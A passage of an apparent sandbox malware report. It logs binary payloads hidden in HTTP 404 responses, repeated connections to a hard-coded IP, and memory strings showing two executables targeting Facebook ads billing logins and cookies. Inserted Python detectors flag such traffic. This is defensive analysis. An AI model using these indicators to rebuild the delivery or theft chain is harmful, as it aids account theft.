74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 
Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JxQQdeSH%2FRqLKZl0%2Famu5hbadwIAtq3ohh8zWVCHwWCrVav84QHXDxiKQu3lGP5gTm3TuQQikvq%2FJDOoozcHsk9Fm9MgDlTINQFMr%2B4bpneX9XsfV0Bxas5kX%2FhLXVsC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47d65eed368c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 60 55 61 3a 79 ca 77 53 d5 9a 8c 9f 09 09 50 5c 31 86 f0 7d e1 37 bd 55 01 2f 79 de 2e f9 56 9c 30 f4 95 ea fe d1 32 eb 55 e0 a0 93 a8 fb 34 51 f7 ec dd d0 60 a8 58 87 cb 1b 8b 72 05 70 be ec f0 c0 a2 09 33 38 28 fa 85 0d a0 f4 03 9b 7c 7f bf 6c 13 d9 e8 ec 3d e5 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 56 2b 7c 9a fd 19 7e 45 f7 ff 78 8d 55 db 24 0d 11 12 b4 1f e8 92 24 82 4e c5 03 9f df a1 61 7e de f5 96 ce 19 17 7e 4f af 9a a5 e4 c8 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f5 96 be 25 51 61 9f d4 3e 7c 88 28 c8 48 6b 51 d5 4a 9a 07 fd ec f1 27 78 ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 e5 22 cd 4f 6b 79 82 ae 9c 37 17 4c 9d 48 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df 35 f9 e7 32 24 4c 80 90 00 f9 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 52 30 ff 9d 3f 
7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 9b 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 db 06 b6 1b 6f d3 cb 29 32 a2 e6 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 4b 11 0c e4 a6 dd 11 9f 10 81 d8 b0 99 89 98 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fa b0 92 48 a9 b4 bb e9 64 17 28 d2 0e 53 1f d0 81 aa 7a 8f 30 69 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a d6 63 b9 82 7b 50 bf e5 7e d9 81 70 d4 03 2b b9 98 76 46 0f ca 82 29 27 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 01 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 Data Ascii: 37af`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*`Ua:ywSP\1}7U/y.V02U4Q`Xrp38(|l=3Ob>!Z:V?#BSSQV+|~ExU$$Na~~OzN.%Qa>|(HkQJ
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sPDhrOjLZofCj5OxhMz6NIXYXAfNgVprp0TU6xLbsmLe9TF0XcXJ7eUfRR4gSq%2FQnENu3rFAu6ALYnAyezy%2FPgdrPY%2FUIezKuwsrV5haZZCsH73rkE9cUnt5IQO%2Bires"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47d90b20368c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 
Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aWGUvC9p7B9ge2VmPEDbD1T2gZA3FnRQeyST42aQmwHMVbkvBU%2BinrYVfPZcF6Ot3cWgx2RtufcPO824ddUMUCbODlWkOHKN%2FXp34UqxUUVD6GPOPfpQOj%2BE6VQ6Zb8q"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47da7d86368c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 64 37 39 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 60 55 61 3a 79 ca 77 53 d5 9a 8c 9f 09 09 50 5c 31 86 f0 7d e1 37 bd 55 01 2f 79 de 2e f9 56 9c 30 f4 95 ea fe d1 32 eb 55 e0 a0 93 a8 fb 34 51 f7 ec dd d0 60 a8 58 87 cb 1b 8b 72 05 70 be ec f0 c0 a2 09 33 38 28 fa 85 0d a0 f4 03 9b 7c 7f bf 6c 13 d9 e8 ec 3d e5 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 56 2b 78 39 84 19 7e 45 f7 ff 78 8d 55 db 24 0d 11 12 b4 1f e8 92 24 82 4e c5 03 9f df a1 61 7e de f5 96 ce 19 17 7e 4f af 9a a5 e4 c8 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f5 96 be 25 51 61 9f d4 3e 7c 88 28 c8 48 6b 51 d5 4a 9a 07 fd ec 1d 4d 78 ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 e5 22 cd 4f 6b 79 82 ae 9c 37 17 4c 9d 48 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df 35 f9 e7 46 24 4c 80 90 00 f9 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 52 30 ff 9d 3f 7f 
55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 9b 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 db 06 b6 1b 6f d3 cb 29 32 a2 e6 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 eb 10 0c e4 a6 dd 11 9f 10 81 d8 b0 99 89 98 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fa b0 92 48 a9 b4 bb e9 64 17 28 d2 0e 53 1f d0 81 aa 7a 8f 30 69 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a d6 63 b9 82 7b 50 bf e5 7e df 81 70 d4 03 2b b9 98 76 46 0f ca 82 29 27 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 01 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 Data Ascii: 7d79`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*`Ua:ywSP\1}7U/y.V02U4Q`Xrp38(|l=3Ob>!Z:V?#BSSQV+x9~ExU$$Na~~OzN.%Qa>|(H
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nm%2B9wXOwJygUApSyo%2FsXU83kSZdAgyRAu2MkrRUoT5YQvFgA6JudWXpw4PtikPgdsZtJvoIAL%2B85C87kuvaeZZSnFfJsEkee%2BuWQ1B%2FqGnSA6JS6apLWz0%2FQnEBwX5OL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47dd29ff368c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 
Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
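The 404 responses listed above all carry the same Cloudflare-fronted headers (Content-Type: text/html; charset=utf-8, Transfer-Encoding: chunked), yet only some of them contain the stock Apache error page: the responses whose chunk size line reads 2c, 37ae, 37af or 7d79 carry non-HTML bytes instead. A 404 that says text/html but ships binary is the cheap thing to alert on here. The block below is an added example and not part of the Joe Sandbox report: a small HTTP/1.1 chunked-body decoder that takes bytes exactly as they appear in the "Data Raw" field (chunk size line first) and a classifier that separates error pages from binary-in-404 responses. The Apache error page is reconstructed from the report's Data Ascii view (CRLF line ends, a lone LF after </address>, as in the hex dump), the 44-byte chunk is the "2c" chunk quoted in the report, and the header dictionary and the function names are constructed for the example.

```python
# Added example (not code from the Joe Sandbox report): decode chunked 404 bodies
# and flag the ones whose payload is not the HTML the headers claim.

# Apache error page as shown in the report's Data Ascii view. The report's chunk
# size line "191" (0x191 = 401) is the length of this body.
HTML_404 = (
    b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\r\n'
    b"<html><head>\r\n"
    b"<title>404 Not Found</title>\r\n"
    b"</head><body>\r\n"
    b"<h1>Not Found</h1>\r\n"
    b"<p>The requested URL / was not found on this server.</p>\r\n"
    b"<p>Additionally, a 404 Not Found error was encountered while trying to "
    b"use an ErrorDocument to handle the request.</p>\r\n"
    b"<hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address>\n"
    b"</body></html>"
)

# The 44-byte "2c" chunk quoted in the report (hex copied from its Data Raw field).
BINARY_CHUNK = bytes.fromhex(
    "00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4a c2 5f 86 07"
    " 9c a7 53 f7 67 a3 7d 0a 55 3b e0 64 55 35 df 0b 67 0e 61 d4"
)

# Constructed header set mirroring the report's responses (only the fields used here).
HEADERS = {"content-type": "text/html; charset=utf-8", "transfer-encoding": "chunked"}


def chunked_frame(payload):
    """Wrap a payload as one HTTP/1.1 chunk: hex size line, data, CRLF."""
    return b"%x\r\n" % len(payload) + payload + b"\r\n"


def decode_chunked(raw):
    """Decode a chunked body captured from the wire.

    Returns (payload, chunk_sizes, complete). `complete` is False when the bytes
    stop before the terminating zero-length chunk, which is what a single
    captured segment (like the report's Data Raw field) looks like.
    """
    payload = bytearray()
    sizes = []
    pos = 0
    while True:
        end = raw.find(b"\r\n", pos)
        if end < 0:
            return bytes(payload), sizes, False          # no size line left
        size_field = raw[pos:end].split(b";", 1)[0].strip()  # drop chunk extensions
        if not size_field:
            return bytes(payload), sizes, False
        size = int(size_field, 16)
        if size == 0:
            return bytes(payload), sizes, True           # zero chunk: body complete
        start = end + 2
        chunk = raw[start:start + size]
        payload += chunk
        sizes.append(size)
        if len(chunk) < size:
            return bytes(payload), sizes, False          # capture truncated mid-chunk
        pos = start + size + 2                           # skip the chunk's closing CRLF


def looks_like_html(payload):
    """True if the payload starts the way an HTML document does."""
    head = payload.lstrip()[:32].lower()
    return head.startswith((b"<!doctype", b"<html", b"<head", b"<body"))


def printable_ratio(payload):
    """Fraction of bytes that are printable ASCII or tab/LF/CR."""
    if not payload:
        return 1.0
    ok = sum(1 for b in payload if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(payload)


def classify_404(headers, raw_body):
    """Verdict for a 404: 'error-page' or 'binary-in-404'.

    A response that declares text/html but whose body neither looks like HTML nor
    is mostly printable is treated as a payload delivery, not an error.
    """
    payload, sizes, complete = decode_chunked(raw_body)
    declared_html = "text/html" in headers.get("content-type", "").lower()
    binary = declared_html and not looks_like_html(payload) and printable_ratio(payload) < 0.9
    return {
        "kind": "binary-in-404" if binary else "error-page",
        "chunk_sizes": sizes,
        "bytes": len(payload),
        "complete": complete,
    }


def run():
    """Classify the two kinds of 404 seen in the report."""
    return (
        classify_404(HEADERS, chunked_frame(HTML_404)),
        classify_404(HEADERS, chunked_frame(BINARY_CHUNK)),
    )


if __name__ == "__main__":
    for verdict in run():
        print(verdict)
```

The decoder deliberately reports `complete=False` for both report samples: the captured segment ends after the first chunk's CRLF and never shows the `0\r\n\r\n` terminator, so a detector working from single segments must not wait for a complete body before deciding.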
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27 (50 identical events)
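The "TCP traffic detected without corresponding DNS query" signature is a correlation between two event streams: an outbound connection to an address that no DNS answer in the same run ever returned means the address was hard-coded or obtained some other way, which is typical of a C2 fallback. The block below is an added example, not code from Joe Sandbox or the report: it walks a constructed, time-ordered event stream and returns the destinations that were contacted without a preceding resolution. The 77.73.134.27 destination is the address the report flags; the hostnames, the RFC 5737 addresses and the timestamps are made up for the example, and the local-network exclusion list is a choice of this example, not the sandbox's.

```python
# Added example (not the sandbox's own logic): flag TCP connections whose
# destination never appeared in a DNS answer earlier in the same run.
import ipaddress
from collections import defaultdict

# Destinations that never need a DNS lookup to be legitimate (example's own choice).
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "127.0.0.0/8", "169.254.0.0/16", "224.0.0.0/4",    # loopback, link-local, multicast
)]

# Constructed event stream. "dns" events carry the answers a resolver returned,
# "tcp" events are outbound connection attempts. Hostnames and the 192.0.2.x
# addresses are hypothetical; 77.73.134.27 is the address from the report.
EVENTS = [
    {"t": 1.0, "type": "dns", "qname": "resolved.example", "answers": ["192.0.2.10"]},
    {"t": 1.5, "type": "tcp", "dst": "192.0.2.10", "dport": 80},    # resolved first: normal
    {"t": 2.0, "type": "tcp", "dst": "77.73.134.27", "dport": 80},  # never resolved
    {"t": 2.1, "type": "tcp", "dst": "77.73.134.27", "dport": 80},
    {"t": 2.5, "type": "tcp", "dst": "10.0.0.2", "dport": 445},     # local, ignored
    {"t": 3.0, "type": "tcp", "dst": "192.0.2.20", "dport": 443},   # answer arrives only later
    {"t": 3.5, "type": "dns", "qname": "late.example", "answers": ["192.0.2.20"]},
]


def is_local(ip):
    """True for destinations on the exclusion list above."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LOCAL_NETS)


def find_unresolved_connections(events):
    """Return {dst_ip: {"connections": n, "ports": [..]}} for unresolved destinations.

    Events are processed in time order, so a connection that precedes the DNS
    answer for its address is still flagged: resolution has to come before use.
    """
    resolved = defaultdict(set)   # ip -> names whose answers carried it
    flagged = {}
    for ev in sorted(events, key=lambda e: e["t"]):
        if ev["type"] == "dns":
            for ip in ev["answers"]:
                resolved[ip].add(ev["qname"])
        elif ev["type"] == "tcp":
            dst = ev["dst"]
            if is_local(dst) or dst in resolved:
                continue
            entry = flagged.setdefault(dst, {"connections": 0, "ports": set()})
            entry["connections"] += 1
            entry["ports"].add(ev["dport"])
    return {ip: {"connections": e["connections"], "ports": sorted(e["ports"])}
            for ip, e in flagged.items()}


if __name__ == "__main__":
    for ip, info in find_unresolved_connections(EVENTS).items():
        print(f"{ip}: {info['connections']} connection(s) without DNS, ports {info['ports']}")
```

Aggregating per destination rather than emitting one line per connection is what turns the report's fifty identical lines into a single actionable finding with a count.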
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000504000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1 equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: </span><a href="/r.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;locale=en_US&amp;display=page" rel="nofollow" class="_97w5">Sign up for Facebook</a></div></div><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value="" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type" /><input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false" /><input type="hidden" autocomplete="off" id="had_password_prefilled" name="had_password_prefilled" value="false" /><input type="hidden" autocomplete="off" name="ab_test_data" value="" /></form><script nonce="tcnyEH4i">window.ge||(window.ge=function(a){return document.getElementById(a)});window.onload=function(a){return function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=new RegExp(a+"=(.*?)(;|$)");return a.test(document.cookie)?RegExp.$1:null}b("c_user")&&!window.__cancelCookieReload&&(window.clearInterval(window.__cookieReload),window.location=a)}function begin_polling_login_cookies(a){window.__cookieReload=window.setInterval(function(){reload_on_new_cookie(a)},5e3),window.__cancelCookieReload=!1,window.addEventListener("beforeunload",function(){window.__cancelCookieReload=!0})}</script></div></div></div></div><div class=""><div class="_95ke _8opy"><div id="pageFooter" 
data-referrer="page_footer" data-testid="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_US&quot;, &quot;https:\/\/de-de.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 0); return false;" title="German">Deutsch</a></li><li><a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 1);
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: cIwww.facebook.comHTEP equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingrk\Cookiescheme1 equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.461533941.000000000052C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingue122samesite22l equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "AXiYmP4qFaQHascr1k0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-xX0","isCQuick":false});</script><script nonce="tcnyEH4i">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tcnyEH4i"></style><script nonce="tcnyEH4i">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="styleshee equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485706369.00000000004EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #63WjvmBvstar-mini.c10r.facebook.comwww.facebook.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 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com' equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com85fCl5 equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comBPxf9szi equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comF5Ljz7 equals www.facebook.com (Facebook)
